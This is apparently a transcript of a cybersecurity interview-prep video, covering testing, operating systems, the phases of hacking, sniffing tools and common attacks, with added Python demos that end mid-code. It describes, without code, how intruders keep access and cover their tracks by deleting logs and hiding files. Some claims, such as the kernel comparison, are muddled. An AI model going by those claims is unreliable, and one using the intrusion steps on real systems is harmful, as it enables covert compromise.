Strike or they go bankrupt and suddenly you can no longer purchase hardware from your vendor because they no longer are in business so that’s a supply chain failure so any of these systems failing would also come under threats so under a broad category these are the first four threats that you need to

Identify and then you can elaborate by providing more scenarios based on the experiences that you have had towards each and every of these threats so natural threat where you may have had experience where there would have been let’s say flooding or any natural disaster which caused a problem for the continuity of your

Particular business so identify each and every example for each of these threats and provide that as an example in the interview what is black box and white box testing so when you are testing a software or you’re testing your infrastructure there are two different tests that you can conduct the first one

Is a black box the second one is a white box in a black box test there is no knowledge that is shared with the tester so let’s say you’re an ethical hacker and you have been awarded a contract by an organization to test the current application that they have developed now

They are not going to give you any information they are not going to tell you what the application is they just probably give you an ip address and a port number where the application is hosted and now you have to fire in your own queries and try to figure out what

The application is try to gather information see what information can be gathered in the first place and based on that you’re going to figure out your way identify vulnerabilities and see if any of those vulnerabilities can lead to a security incident so without any knowledge zero

Knowledge of the it infrastructure or the source code that’s a black box attack or a black box test a white box test on the other hand is where full knowledge of the it infrastructure or the source code is shared so the ethical hacker has complete knowledge

And based on the knowledge they are then going to test out the system to see if there are any flaws that they can identify right so why would these two audits be important because the first one a black box audit emulates the attack of an outsider an external hacker sitting outside the

Organization trying to figure their way in whereas a white box attack can emulate the attack of an insider so a disgruntled employee within that organization misusing their access controls or the access rights to make unvalidated profits right so somebody who’s corrupt who has been bribed who wants to sell out company

Secrets so they’re going to try to find out vulnerabilities try to steal data and try to sell it on the gray market right so a white box would emulate an internal attack a black box would emulate an external attack moving on to question 17 what is use case testing

Now use case testing is a functional test and it is also a black box test right what is a functional test it tests the functionality of a particular software once it has been created why is it a black box test because the user doesn’t know what the functionality

Is they just want to find out each and every scenario and try to see what that scenario generates as a response they are not sure whether that is the appropriate response that should be generated or not they’re just trying to find out the response that is going to be generated

After they fire off a query so this technique is used by testers to get the test scenarios to exercise the whole system from start to finish so let’s say it’s a login mechanism for an application right now a user at this point in time the tester since

It’s black box testing will know that it is a login mechanism they will not know the details of what login mechanisms are being utilized so they wouldn’t know whether input validation is done they wouldn’t know whether output encoding is done they wouldn’t know how the cgi calls are

Being made they will not know how the queries are handled at the server side and how the database is going to treat that particular query so they have no idea whether sql injection attacks are possible and so on so forth so for them with whatever input they are going to try to insert

For that login mechanism that’s a functional black box test the functionality being whether the login mechanism works and based on the type of inputs that are going to be put in whether it creates an unwarranted output whether they can bypass the mechanism or they can hack into the system because of

Some of the flaws that were left behind right another example here is a software made for users to use for documentation the testers will test all the cases that the user can do so can the user view a document can they add new documents can they edit documents and can they delete documents

So this functionality will depend upon the access controls that have been granted to a particular user so for this particular user the tester at this point in time they would not know whether they’re an administrative user or they’re a regular user they’ll just try to do all of these

And then write the responses saying i was able to view i was able to add i was able to edit and i was able to delete now the result will be then sent to a manager the manager will look at the results and then based on the actual

Access controls that were supposed to be there for this particular user then we’ll try to identify whether this is an acceptable case or whether there were any flaws within this case moving on to question 18 what is static and dynamic testing now this is again in application testing

Static testing is done in an early stage of the development life cycle now software development life cycles there are multiple of those what are these life cycles there are different stages in which an application is created and provided to the customer so your first stage would be determining the

Scope of the application determining the hardware requirements for that application then creating a flowchart for that application a functional chart for that application and then maybe start coding then an architect comes in tests the code verifies the code then the testing phase comes in then the security testing

Phase comes in and then the user acceptance testing comes in but in every stage at the very earliest or first stage a static test will always be started to see whatever code has been developed whatever scope has been developed whether that scope is going to be correct or not this

Will include walkthroughs and code review what is a walkthrough a walkthrough is going through documents that have been generated and trying to find faults in the documented journey that has been created so far so let’s say somebody has created a workflow or a flowchart for a program how the

Functions are going to be called and how they’re going to be executed so a walkthrough would be where all these responsible people will walk through that particular flowchart and find out any flaws within that and then rectify them if there is any code that has already

Been written this code will be reviewed manually and any flaws within that code would then be identified static testing will always be 100% accurate in a very short amount of time because it is immediate you have created it and then the expert is going to test it to see whether everything is

Fine or not right it is all about a prevention mechanism so since you are doing it at the inception itself if you find any flaw it gets immediately repaired so this is about preventing vulnerabilities from creeping into that application at a later point in time whereas dynamic on the other side is

Done at the end of the development life cycle so you have generated the application everything is ready now you want to do dynamic testing includes functional and non-functional testing functional testing is where the application itself is being tested the functions to see that all the parameters that are given to the application are

Functioning properly non-functional testing would be where security parameters administrative parameters all of them are being verified right this is where your test case scenarios come in and you’re going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you

Dynamic testing is all about cure so here you’re going to identify vulnerabilities report them to the management and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated moving on to the next question what are the test levels in software testing so

As far as software testing is concerned there are four test levels module testing integration testing system testing and the final one is acceptance testing so in the testing phase of your development life cycle the first thing is a module test you’re going to check your routines your subroutines your sub

Programs procedures that have been written in a program so all your functions all your mechanisms for that application are going to be tested when you go into integration testing the software may have been integrated with multiple software packages there may be different api calls coming in maybe a third party

Software on which you are depending to supply information so all of these integrations of various software various apis are tested to ensure that they are functioning properly and there are no flaws errors or mistakes left behind in the integration of all of these software packages then the system testing

Is where the entire system so including the hardware including the software right it starts from the installation so now the software is complete we know which hardware we are going to support for it we start by installing the software and see whether installation is going to be completed properly if there

Are any errors in the installation process itself then once it is installed the performance of that particular application the write speeds the read speeds on the hard disk the transaction speeds that the application is capable of the network dependencies that the application may have all of those would come under

System testing and then the acceptance testing which is basically a quality assurance exercise that the application meets the client’s requirements so the client in the first stage would have given the scope of what needs to be achieved in the acceptance testing you’re verifying that the scope has been met and the client requirements

Have been met and you can assure the client about the functionality and the performance of that particular application coming to the last question in this software and programming section what are the valuable steps to resolve issues while testing so in the previous scenarios when we have started testing now if you find out

When you execute a particular use case and then you find a flaw what would be the steps that you would utilize to address those particular flaws in those tests the first step will always be record then you’re going to report it and then you’re going to introduce a

Control process for it so when you say record you’re going to create logs and you’re going to try to resolve all the problems that have happened now when you say resolve you’re not going to recode the application but you’re going to test the system again and again to

Ensure that whatever is being recorded is accurate and all the logs all the error mechanisms all the dumps all of those that have been generated due to this particular flaw or this particular error are being captured so that they can be reported to the higher level managers so

The next step is once you have eventually accumulated all these logs and records you’re going to report them to the higher level managers who are then going to investigate it and go back to the developers trying to figure out the best way to mitigate those particular flaws so the report writing

Also needs to be accurate it needs to be to the point it needs to detail what the problem was it will document all the steps that you took all the inputs that you put in and it will also record all the errors and it will also

Record all the mechanisms that were utilized and the errors that were encountered and that report will be given to the higher level managers who can then forward it to the developers who based on those reports can start their troubleshooting and then the control mechanism comes in you’re going to define the issue management process

So this process needs to work in a particular manner where you’re doing a test you’re recording whatever is happening you’re creating a report out of it you’re sending it to the management the management will then take those reports study them take it to the developers the developers will test

Based on their criteria they might interact with the testers at that point in time to identify particular flaws and then they might want to recode that application in a developer patch which once installed will mitigate that particular flaw and then it can come back to the testing

Phase again where you can repeat those tests and validate that the flaw is no longer existing so these are the three steps that would be utilized for testing purposes and that brings us to the first 10 questions on the software platform in the next video we’ll be looking at

Operating systems and applications the first question is on virtual memory what exactly is virtual memory for a computer we have two types of memory the first is the primary memory which is your random access memory which is also known as a volatile memory and the secondary memory is your hard disk

Where your data is stored permanently but for a computer when it has let’s say a 4gb memory or a ram as in this scenario on your screen it is going to replicate that and is going to create another 4gb of virtual memory on the

Hard disk and it is going to use it in tandem along with the ram so if the ram is insufficient the processor is going to utilize the 4gb of the virtual memory that is created on the hard disk and it is going to swap data from the ram to the hard disk

This can also be known as a page file or a swap file the next question is what are the different scheduling algorithms now the context for this question is you’re talking about the processor and you’re talking about how processes are going to be fed to the processor and how

The processor is going to treat these processes so the first is first come first serve so the process which requests the cpu first gets the cpu allocation first now whenever there are processes that are being run by different applications they make requests for some cpu time

Now in first come first serve the first process that is going to request some processing time will get that much allocated to them they will run through the process first and then the next and the next and so on so forth the second one is the shortest job first

This is the process where the shortest execution time for that process is calculated and that process is selected first for the cpu then there is parity scheduling this scheduler selects the task to work as per priority so there would be some tasks that are marked with high priority

Some would be normal and some would be low so based on this high normal or low priority all the processes will be classified higher priority will be dealt with first then the normal and the least priority the fourth option is multiple level queues where processors are assigned to

A queue based on the specific property like process priority the size of memory etc so it will be classified based on the attributes given to that particular process and multiple queues will be created and then based on the attributes the processes will be processed by the cpu then shortest remaining time the process

Will be allocated to the task which is closest to its completion so or look at it this way the process that will take the least time to complete its processing would be chosen first and then the round robin method where each process comes in turn gets an equal

Share of time so if there are 10 processors each process will be allocated a certain amount of time after which the next process will be processed and so on so forth and it will continue in a round robin fashion till all the processes get executed so in short six different scheduling algorithms
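As an added worked example for the scheduling question (editorial code, not from the video or from Simplilearn): a small simulator that runs one constructed workload through first come first served, shortest job first, priority scheduling, shortest remaining time and round robin, and compares the average waiting time each policy produces. Multilevel queues are left out. The process names, arrival times, bursts, priorities and the quantum of 2 are assumed values chosen for the illustration, and a lower priority number is taken to mean a higher priority.

```python
from collections import deque
from dataclasses import dataclass


@dataclass
class Proc:
    name: str
    arrival: int       # time the process becomes ready
    burst: int         # total CPU time it needs
    priority: int = 0  # lower number = higher priority (assumption for this example)


def _nonpreemptive(procs, pick):
    """Shared loop for the non-preemptive policies: once picked, a process runs to completion."""
    time, finish = 0, {}
    while len(finish) < len(procs):
        ready = [p for p in procs if p.arrival <= time and p.name not in finish]
        if not ready:                       # CPU idle until the next arrival
            time = min(p.arrival for p in procs if p.name not in finish)
            continue
        p = pick(ready)
        time += p.burst
        finish[p.name] = time
    return finish


def fcfs(procs):
    """First come, first served: earliest arrival wins."""
    return _nonpreemptive(procs, lambda r: min(r, key=lambda p: (p.arrival, p.name)))


def sjf(procs):
    """Shortest job first (non-preemptive): smallest burst among the ready processes wins."""
    return _nonpreemptive(procs, lambda r: min(r, key=lambda p: (p.burst, p.arrival, p.name)))


def priority_sched(procs):
    """Priority scheduling (non-preemptive): highest priority (lowest number) wins."""
    return _nonpreemptive(procs, lambda r: min(r, key=lambda p: (p.priority, p.arrival, p.name)))


def srtf(procs):
    """Shortest remaining time first: re-evaluated every tick, so a newly arrived short job preempts."""
    remaining = {p.name: p.burst for p in procs}
    time, finish = 0, {}
    while len(finish) < len(procs):
        ready = [p for p in procs if p.arrival <= time and p.name not in finish]
        if not ready:
            time += 1
            continue
        p = min(ready, key=lambda q: (remaining[q.name], q.arrival, q.name))
        remaining[p.name] -= 1
        time += 1
        if remaining[p.name] == 0:
            finish[p.name] = time
    return finish


def round_robin(procs, quantum):
    """Round robin: each ready process gets at most `quantum` ticks, then goes to the back of the queue."""
    remaining = {p.name: p.burst for p in procs}
    pending = sorted(procs, key=lambda p: (p.arrival, p.name))   # not yet arrived
    queue, time, finish = deque(), 0, {}

    def admit():   # move everything that has arrived by `time` into the ready queue
        while pending and pending[0].arrival <= time:
            queue.append(pending.pop(0))

    admit()
    while queue or pending:
        if not queue:
            time = pending[0].arrival
            admit()
            continue
        p = queue.popleft()
        run = min(quantum, remaining[p.name])
        time += run
        remaining[p.name] -= run
        admit()                 # arrivals during the slice queue up ahead of the preempted process
        if remaining[p.name] == 0:
            finish[p.name] = time
        else:
            queue.append(p)
    return finish


def average_wait(procs, finish):
    """Waiting time = turnaround (finish - arrival) minus the CPU time actually used."""
    return sum(finish[p.name] - p.arrival - p.burst for p in procs) / len(procs)


# Constructed workload for the illustration: name, arrival, burst, priority.
WORKLOAD = [Proc("P1", 0, 8, 3), Proc("P2", 1, 4, 1), Proc("P3", 2, 9, 4), Proc("P4", 3, 5, 2)]


def compare(procs=WORKLOAD, quantum=2):
    """Average waiting time under each policy for the same workload."""
    return {
        "fcfs": average_wait(procs, fcfs(procs)),
        "sjf": average_wait(procs, sjf(procs)),
        "priority": average_wait(procs, priority_sched(procs)),
        "srtf": average_wait(procs, srtf(procs)),
        "round_robin": average_wait(procs, round_robin(procs, quantum)),
    }


if __name__ == "__main__":
    for policy, wait in compare().items():
        print(f"{policy:12s} average wait = {wait}")
```

Running it prints the average waiting time per policy. On this workload FCFS gives 8.75, SRTF 6.5 and round robin with a quantum of 2 gives 12.75, which is the usual trade-off: the preemptive shortest-first policy minimizes waiting time, while round robin pays extra context switches to give every process a fair turn.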

The next question is: what are the steps involved in hacking a server or a network? This is more of an ethical hacking question. You're looking at devices, and the interviewer asks you what kind of steps are involved, what activities you would do in hacking a server or a network. Now there are no specific steps that you would define, because every hack is going to be unique, but a hack can be classified into five different steps which are quite generic.

The first step will always be the reconnaissance step, also known as the information gathering phase, also known as footprinting or fingerprinting, depending on what exactly you're doing. In this phase the attacker gathers all the evidence, all the information that is possible about the targets they want to attack. Here you're trying to get to know the victim so you can launch specific attacks towards them: you want to identify what operating system they are utilizing, what IP addresses, MAC addresses, the versions of the operating systems and applications, the patch levels; find out vulnerabilities; find out whatever information is possible; find out information about the person who is using those computers so you can launch social engineering attacks, and so on. So the first step is all about gathering enough information based on which you can launch further attacks.

Once you have that information comes the second phase, which is known as the scanning phase. This is more of a technical phase: in the first step you got your IP addresses, domain names, maybe even network maps, and you have identified which devices are available; now in the scanning phase you're going to identify live devices and then scan them for open ports, processes, protocols and services, identify vulnerabilities, and enumerate them to extract more information from them. At this point you will have identified a certain set of vulnerabilities, or a certain set of security loopholes, that you can misuse.

Once you have identified those, you go to the next step, which is the gaining access step. In this step you're actually going to execute your attacks based on the vulnerabilities that you have found, and you're either going to gain access to that particular system by installing a trojan, or destroy the system by installing a virus, or install spyware or a keylogger, whatever you wanted to achieve. So in the gaining access phase, based on the knowledge you gained in the first and second phases, you launch your attacks and try to gain access to that particular device.

Then the next step is where you maintain that access. Now that you have hacked into that device, it is not necessary that you will always be able to get access to it: suppose you have cracked the password of a particular user and the user changes that password after a few days; your attack is worthless. So what you do here is maintain your access. This is where it is assumed that you want repeated access to that device, and thus you install a keylogger or a trojan or some mechanism which will still allow you to access that device without the knowledge or the authorization of that particular user.

And finally the last step is where you cover your tracks. Whatever activity we have done so far will have created logs and information based on which the victim will come to know that they have been compromised, and may be able to trace that activity back to you. So to prevent the victim from realizing that they have been hacked, and to prevent them from discovering who hacked them, you want to cover your tracks by deleting logs and any references that point to that particular activity. You're going to hide the files that you have created: you have installed a trojan or a keylogger, these will create files and directories, and you hide them so that they are not discovered; you hide the processes that have been created; you try to hide all the activity that you have done, so as to conceal the actual attack and prevent the user from realizing that they have been compromised. So these are the five steps that will be

involved in hacking a server, network, application or any computing device you'll come across.

The next question refers to what the various sniffing tools are. Sniffing is a network-based attack where you're trying to capture data packets that have been transmitted over the network and then analyze them to see if you can capture any sensitive information like usernames, passwords, bank details or anything of that sort. Now these tools will also depend on which operating system you're utilizing: for example, MSN Sniffer would work on Microsoft operating systems, Ettercap would be based on Linux, and so on. On the screen you'll see six different sniffing tools that work on different operating systems. Wireshark is something that is common to both Windows and Linux; it is used to analyze the network in detail, and it is the de facto tool that you will come across in most of your ethical hacking trainings and in most organizations when they want to do data captures. Now data capturing, or packet capturing, is not only done by hackers to gather more information; it is also a well-known troubleshooting technique used by system administrators and network administrators to analyze any issues that may be going on in the network. So the first tool you see on the screen is Wireshark, which, as we stated, is available for Windows as well as Linux. Then there is tcpdump, which again has the same capabilities as Wireshark but is a command-line tool, whereas Wireshark also has a GUI, a graphical user interface; tcpdump is available on Linux. MSN Sniffer is a very old tool from when we had MSN Messenger; MSN Messenger is no longer there, but Microsoft does, or did, have a Microsoft Message Analyzer tool, which they have stopped developing since 2015, and that's another tool specific to Microsoft operating systems, from Microsoft, that can be installed to gather more information. Then you've got Ettercap, which is a tool to launch man-in-the-middle attacks and do data captures, and is essentially a Linux command-line based tool. Then dsniff is another password and network capture tool which can help you capture data packets, predominantly a Linux tool. Same with EtherApe: this is a graphical tool which will allow you to capture data traffic, map protocols and identify which IP addresses have been communicating with what. Essentially all of these tools have similar functionality, except that some have additional functionality like launching man-in-the-middle attacks, or have specific filters that will help you identify and troubleshoot some network issues that you may be facing.

Moving on to the next question: what is an operating system? Now this is a very difficult question to answer, because

normally, when we want to answer this question, we start off with the functionality of an operating system: we try to describe what Windows does, or what Linux does, or what macOS does, and then we try to figure out what an operating system is in the first place. But an operating system, essentially, as the slide says, is a software program that provides a platform for the computer hardware to communicate and operate with the computer software. So it is basically an enabler for human interaction with the hardware that you have. If you take the operating system out of the question, it's just some hardware which cannot interact with you; but when you have an operating system like Microsoft Windows or Linux or macOS, you're essentially installing an instruction set on that particular device which will allow you to interact with and manipulate the hardware to do whatever you want that hardware to do. Essentially, when we talk about drivers for your various devices, like a driver for your LAN card or for your sound card or your graphics card, these allow you to tweak those cards for a functionality; they allow us input and output functions. For example, the basic example: you open up Microsoft Office products like Microsoft Word or Excel and you get a GUI on the screen which you can interact with; you've got a keyboard and you type on that keyboard, and the computer knows what you're typing and reflects those actions on the screen by showing them in that particular Excel or Word file. So how does the computer know what to do, or what you're exactly intending to do, at this point in time? It is all the operating system that is providing you all these services, analyzing what your inputs are and then, based on the programming, executing that and showing it to you on the screen. Some of the most commonly used operating systems are Microsoft Windows, which you have in desktop as well as server variants; Unix and Linux, again Linux as desktop and servers, you've got Ubuntu and Red Hat and so on; and then you've got macOS for Apple-related components.

The next question: what is the difference between a micro kernel and a macro kernel? The first thing we need to know is what the kernel is. The kernel is the heart of the operating system that allows that input and output to happen; it allows those drivers to be set up so that the hardware can interact with the software, and we can then instruct both the software and the hardware to function in a particular manner. So there are two types of kernels, micro kernels and macro kernels. The micro kernel is something that we normally use; micro kernels are for operating systems that use processes directly handled by the processor. The micro kernel is very small in size; the macro kernel is large because it basically is the entire image of the operating system. The execution for a micro kernel is slow; the macro kernel is going to be faster because it is more evolved, there's a lot of programming involved. Extendability: micro kernels are easy to extend, macro kernels are hard to extend. As far as security is concerned, if a macro kernel crashes it takes everything down with it, the entire operating system is going to crash, but in the case of a micro kernel it is only that particular process that is going to be affected. In a micro kernel there is a lot of coding involved; in a macro kernel less coding is involved. Examples of micro kernels would be Symbian OS, most popularly used on yesteryear phones, Nokias if you remember those, QNX and so on; as for macro kernels, your Linux or BSD operating systems essentially use macro kernels.

The next question: what are the different types of operating systems? As you can see on the screen,

there are five types of operating systems: batched OS, distributed operating systems, time sharing, multi-programmed and real-time. What are batched operating systems? The computer operator places the jobs coming from input devices into batches. Consider this not from a desktop perspective but from a server perspective, where these devices are used by organizations to compute and to crunch processes that make some business sense. So when there are multiple processes coming in, multiple jobs that are going to be scheduled, a batched OS is going to place these jobs in batches and crunch them based on the inputs that have been given by the operators. Distributed OSs are where there are multiple computers which are interconnected and communicate through networks. In a corporate environment you don't use one single computer to do everything: you've got a data center, and the data center will have a cluster of servers which share resources to crunch one particular task; that's where distributed OSs come into the picture. Then you have time sharing OSs, where you are renting some time; time sharing minimizes the response time. An example in today's world is the cloud: you go onto the cloud, you have a virtual server over there, you schedule something, you submit your job over there, it is executed, and for that time that operating system services your particular request and provides you that particular job. Any application that you see online, for example Facebook from a consumer's perspective, could be a time-shared experience. Then the multi-programmed OS: the operating system uses CPU scheduling to separate jobs, so you're scheduling the CPU to complete certain jobs in a particular manner. And in a real-time OS the operating system gives maximum time to critical operations: it identifies the priority of these operations, it knows the high priority items and the medium and low priority items, and based on that it is going to execute these critical operations and get the job done.

Moving on to the next question: what is the difference between logical address space

and physical address space? When you're looking at address spaces, this is where applications come into the picture. When you execute an application it is going to create a particular address in memory where it is going to create a buffer to store its own information, so that it can be provided to the processor, processed, and then written back to the application as an output. As far as definitions are concerned, a logical address is generated during the running of an application or a program; a physical address is a physical location on the memory module itself. Visibility: you can view a logical address because it is programmed into a computer. So if I'm looking at C or C++ and I'm using malloc, or memory allocation, that's where the logical address is going to be created, where a buffer is going to be created for that program, and whatever the user input is going to be, it's going to be stored in that buffer. Whereas as far as physical addresses are concerned, this logical address will be created on a physical store or a physical memory module, which will have its own addressing mechanism; thus you can see the memory module but you cannot see the specific address on that particular memory module. But as far as a logical address is concerned, while you're programming or you're debugging the application it will show you the logical address that has been created, the start point and the end point of the logical address that has been created for that particular program; it can be shown in a debugging environment. Address space: logical is logical, and physical is physical, in this case the memory module itself. Access: you can access only the physical address on that particular memory, because logical addresses can be viewed but you cannot access them physically. Generation: logical addresses are generated by the CPU during processing time, whereas physical addresses are computed by the memory management unit, or MMU, that you have on your computers. And as far as logical addresses are concerned, they are variable, whereas the physical address is always going to be constant.

Looking at the next question: what is the difference between logical address space and physical address space? Moving on from the previous question to this one, the logical address is an address created by the CPU for the processes that need to be addressed and that can be stored as a buffer in the physical memory, whereas the physical address itself is going to be an address on the physical part of that memory, which is going to be assigned to it by the MMU. Then the next question discusses

shells: so what shells are used in Linux? Now what is a shell? The shell is the command-line interface that we utilize on a Linux machine, so the terminal window, as we call it, is a shell, and there are different variations of a shell based on which Linux operating systems you're using, the desktop operating systems or the server operating systems. Really, in today's world, you will normally always have a bash shell, which is the first shell that you see on the screen, known as the Bourne-again shell; it is the default for Linux distributions. So as far as regular end consumers are concerned, it is always going to be a bash shell, a Bourne-again shell, that you're going to utilize for scripting and to execute regular commands. But when it comes to high-level programming, or to specialized tasks, then you've got the rest of these shells that you can utilize. For example, ksh, known as the Korn shell, is used for high-level programming and supports associative arrays and built-in operations. csh, or the C shell, has different functionality like spelling correction and job control. zsh, or the Z shell, provides unique features like file generation and startup files, and fish, the friendly interactive shell, provides features like auto suggestions and configuration. So all of these have different functionality depending on what usage you have for that particular shell; the most common shell, like I stated, is the bash shell that you'll always come across in your desktop Linux operating systems.

Then looking at the next question: what are the process states in Linux? Now what is a process? A process is basically a service that is running for a particular application, for an application to function. This process is going to direct user input to the processor, process it, get that output back to the application, execute it and then show it on the graphical user interface for the user. In Linux there are five states for a process. First is the ready state: in this state the process is created and is ready to run, so it is waiting; the application is executed. Running is when the process itself is being executed. Blocked or wait is when user input is being looked for: it's waiting for user input so that it can do the processing. Completed or terminated: it has completed its execution or was terminated by the operating system for some reason or the other, so this is where the processing has been completed. And the last state is zombie, where the process is terminated but the process table still holds its information; maybe it is waiting for the kill request before it gets removed. So these are the five states for a Linux process to be in, and that brings us to the end of the ten questions in the operating system and application space. In the next video we'll be looking at ten more questions on cyber attacks.
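An added example for the process-state question above (editorial code, not from the video or from Simplilearn): it forks a child that exits immediately, reads the child's state from /proc/<pid>/stat while the parent has deliberately not called wait() yet (falling back to ps where /proc does not exist), and only then reaps it. The point is the gap between the child exiting and the parent calling waitpid(): during that gap the kernel still reports the child, as Z (zombie), and only after the wait does its process-table entry disappear.

```python
import os
import subprocess
import time


def process_state(pid):
    """One-letter scheduler state of `pid` (R running, S sleeping, Z zombie, ...),
    or None once the kernel has dropped its process-table entry.
    Linux: /proc/<pid>/stat; other Unix-likes: fall back to `ps`."""
    try:
        with open(f"/proc/{pid}/stat") as f:
            stat = f.read()
        # field 2 (comm) sits in parentheses and may contain spaces; the state follows the ')'
        return stat[stat.rindex(")") + 2]
    except FileNotFoundError:
        if os.path.isdir("/proc"):
            return None                # /proc exists, so the process is simply gone
    out = subprocess.run(["ps", "-o", "stat=", "-p", str(pid)],
                         capture_output=True, text=True).stdout.strip()
    return out[:1] or None


def observe_zombie(timeout=5.0):
    """Fork a child that exits at once and do NOT wait for it yet.
    Returns (state seen before reaping, state seen after reaping)."""
    pid = os.fork()
    if pid == 0:
        os._exit(0)                    # child: terminates immediately
    deadline = time.time() + timeout
    state = process_state(pid)
    while state not in (None, "Z") and time.time() < deadline:
        time.sleep(0.01)               # child still R or S: give it time to exit
        state = process_state(pid)
    before_reap = state                # expected "Z": exited, but entry kept for the parent
    try:
        os.waitpid(pid, 0)             # parent collects the exit status: entry is released
    except ChildProcessError:
        pass                           # already reaped (e.g. SIGCHLD ignored by the caller)
    return before_reap, process_state(pid)


if __name__ == "__main__":
    print(observe_zombie())            # ('Z', None)
```

The same mechanism is why a long-running parent that never waits on its children slowly fills the process table: each child keeps its entry (its PID and exit status, nothing else) until someone calls wait() on it, and a zombie cannot be "killed" because it has already exited.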

Interview questions based on cyber attacks: let's start off with the first one. The first question is: what is SQL injection? SQL stands for Structured Query Language, which is a language that is used by most of your databases, or your relational databases. The variations of your database would be MySQL, Microsoft SQL, Oracle SQL, you'll have IBM databases; all of these databases utilize the Structured Query Language to interact with the applications. Now all of these databases have their own syntax, so you'll have to study most of these databases based on which applications and which databases you want to provide security for. But as the name suggests, a SQL injection vulnerability, or Structured Query Language injection vulnerability, is where a user can maliciously inject a SQL input or a SQL statement into a query, send it to the database and evoke a response out of it. So this vulnerability is not specific to the database; the vulnerability lies more in the application and the coding of that application. When the application receives a query which needs to be forwarded to the SQL database, we need to configure, at the application level, what queries are allowed and what queries are not allowed. So there are various aspects of how to manage a SQL injection vulnerability, but the basic flaw lies in the application, where unvalidated input is accepted and sent forward to the database, where the database might confuse it for an executable statement and thus create a response that was not warranted. There are various types of SQL injections, as shown on the screen: in-band SQL injection, where you can look at an error-based or a union-based injection; blind SQL injection, where it is either a boolean-based or a time-based attack; and then out-of-band SQL injection. Essentially you're looking at databases and at application security, where you want to encourage secure coding practices so that unvalidated input is mitigated.

The next question is: what is spoofing? In spoofing you're basically assuming the identity of another person. Here the attacker pretends to be some other person or an organization and sends you an email that appears to be a legitimate email: it looks almost genuine, it has been constructed to replicate what a genuine email would have been, and it is very difficult to spot a fake one. There are different ways to identify whether an email is genuine or not, but that's for a different video.

Moving on to the next question: what is a distributed denial of service attack, or a DDoS attack? Generally, a denial of service attack is an attack where legitimate users are prevented from accessing the resources that they can legitimately access. So for example, if it is a bandwidth-based attack, the attacker consumes the bandwidth of the network in such a way that there is no bandwidth left for legitimate users to access the network. Now a single device may not be able to generate that much traffic to consume the bandwidth of a huge server, thus the attacker will construct a botnet, and through that botnet they will launch a distributed denial of service attack on the target victim. There are two terms that you want to look at over here: the first term is a bot and the second is the botnet itself. A bot is software that, once installed on a victim's machine, allows the hacker to send remote commands to that machine that will make it generate some activity. Once we have enough machines on which such bots have been implanted, the collection of these machines is known as a botnet. An attacker would then instruct this entire botnet to start generating data traffic to be sent to the targeted network or the targeted server, which will then bring down the server, thus crashing it and preventing users from

accessing that particular resource.

The next question is how to avoid ARP poisoning. First let's understand what ARP is. ARP stands for Address Resolution Protocol, which is a protocol used by computers to communicate over the network. Once your computer boots up it starts a discovery process of identifying its neighbours: if I'm in a particular subnet, my machine will proactively send out an ARP request, an Address Resolution Protocol request, to find out which other machines are within the same network and which are live. Once it sends out a query, a live machine will respond to that query with its MAC address. This information is then stored in what is known as an ARP table in the machine's cache. So whenever my machine now wants to send a packet to this particular machine, it will go to the ARP table, identify the IP address and the associated MAC address, print those onto the data packet as the destination IP and destination MAC, and send that packet across to the switch; the switch will then identify the MAC address and send the packet to the relevant machine connected to that particular switch. Now, to confuse the switch into sending it to a different machine, an ARP poisoning attack is created; this attack is generally launched to create a man-in-the-middle attack.

To prevent ARP poisoning from happening in the first place, there are three different aspects that we can utilize. First, we can use packet filtering, which will filter out and block packets that have the same source address data. So you have identified some malicious IP addresses and you want to block them out, so you're using a packet-filtering firewall, where you have configured the firewall to filter out certain packets originating from a particular range of IP addresses; this firewall and this technique will then block those kinds of packets coming in. Second, keeping away from trust relationships: organizations will develop protocols that do not depend on trust relationships, and thus you want to keep this protocol away from there. Once you have created a trust relationship, these machines should not be sending out ARP requests to other machines in the first place, since the trust relationship has been defined and these machines know whom to communicate with; such protocols should then be disabled. Or you can use ARP spoofing software: there is software out there that will look for ARP spoofing and prevent it from happening in the first place, so if somebody has sent out a spoofed ARP packet, that packet will be picked up by this software and mitigated. Network visualizers like GlassWire and antivirus products like Sophos have inbuilt capabilities for identifying ARP spoofing attacks and mitigating them in the first place.
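An added example for the ARP poisoning question (editorial code, not from the video or from Simplilearn; the MAC addresses, IP addresses and the attack sequence are constructed). It shows what the ARP spoofing software mentioned above has to do: parse raw Ethernet/ARP frames, keep a table of which MAC each IP has been seen at (pre-seeding the gateway plays the role of a static ARP entry, the arp -s style mitigation), and alert when a reply contradicts the table, when the ARP sender MAC disagrees with the frame's source MAC, or when one MAC claims more than one IP, which is exactly the pattern of an attacker poisoning both ends of a man-in-the-middle.

```python
import ipaddress
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ETH_FMT = "!6s6sH"                  # dst MAC, src MAC, EtherType
ARP_FMT = "!HHBBH6s4s6s4s"          # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip, frame_src_mac=None):
    """Ethernet frame carrying an ARP reply ("sender_ip is-at sender_mac").
    Used here only to construct sample traffic; a real monitor would read frames
    from a raw socket or a pcap file."""
    eth = struct.pack(ETH_FMT, _mac(target_mac), _mac(frame_src_mac or sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      _mac(sender_mac), ipaddress.ip_address(sender_ip).packed,
                      _mac(target_mac), ipaddress.ip_address(target_ip).packed)
    return eth + arp


def parse_arp(frame):
    """Decode the Ethernet and ARP headers; returns None for non-ARP frames."""
    if len(frame) < 42:
        return None
    _dst, src, ethertype = struct.unpack(ETH_FMT, frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    _ht, _pt, _hl, _pl, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": op, "eth_src": _mac_str(src), "sha": _mac_str(sha),
            "spa": str(ipaddress.ip_address(spa)), "tha": _mac_str(tha),
            "tpa": str(ipaddress.ip_address(tpa))}


class ArpMonitor:
    """Passive ARP-spoofing detector: remembers the first MAC seen for each IP
    (or a pre-seeded static entry) and alerts on replies that contradict it,
    or that have one MAC claiming several IPs."""

    def __init__(self, static=None):
        self.table = dict(static or {})          # ip -> mac, trusted
        self.claims = defaultdict(set)           # mac -> set of ips it has claimed
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            return
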